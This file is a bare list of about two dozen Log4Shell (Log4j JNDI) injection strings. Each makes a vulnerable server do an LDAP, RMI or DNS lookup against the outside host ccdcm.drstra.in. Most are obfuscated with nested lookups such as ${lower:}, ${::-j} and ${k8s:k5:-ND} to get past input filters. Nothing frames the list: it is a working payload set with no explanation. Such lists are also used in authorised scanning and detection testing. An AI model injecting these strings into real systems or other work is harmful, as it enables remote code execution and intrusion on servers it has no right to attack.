${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://{{ccdcm.drstra.in}}/314445},
${${::-j}ndi:rmi://ccdcm.drstra.in/314445},
${jndi:rmi://ccdcm.drstra.in/314445},
${jndi:rmi://ccdcm.drstra.in}/,
${${lower:jndi}:${lower:rmi}://ccdcm.drstra.in/314445},
${${lower:${lower:jndi}}:${lower:rmi}://ccdcm.drstra.in/314445},
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://ccdcm.drstra.in/314445},
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://ccdcm.drstra.in/314445},
${jndi:dns://ccdcm.drstra.in/314445},
${jnd${123%25ff:-${123%25ff:-i:}}ldap://ccdcm.drstra.in/314445},
${jndi:dns://ccdcm.drstra.in},
${j${k8s:k5:-ND}i:ldap://ccdcm.drstra.in/314445},
${j${k8s:k5:-ND}i:ldap${sd:k5:-:}//ccdcm.drstra.in/314445},
${j${k8s:k5:-ND}i${sd:k5:-:}ldap://ccdcm.drstra.in/314445},
${j${k8s:k5:-ND}i${sd:k5:-:}ldap${sd:k5:-:}//ccdcm.drstra.in/314445},
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}ldap://ccdcm.drstra.in/314445},
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}ldap{sd:k5:-:}//ccdcm.drstra.in/314445},
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}ap${sd:k5:-:}//ccdcm.drstra.in/314445},
${j${k8s:k5:-ND}i${sd:k5:-:}${lower:L}dap${sd:k5:-:}//ccdcm.drstra.in/314445,
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}a${::-p}${sd:k5:-:}//ccdcm.drstra.in/314445},
${jndi:${lower:l}${lower:d}a${lower:p}://ccdcm.drstra.in},
${jnd${upper:i}:ldap://ccdcm.drstra.in/314445},
${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://ccdcm.drstra.in/314445}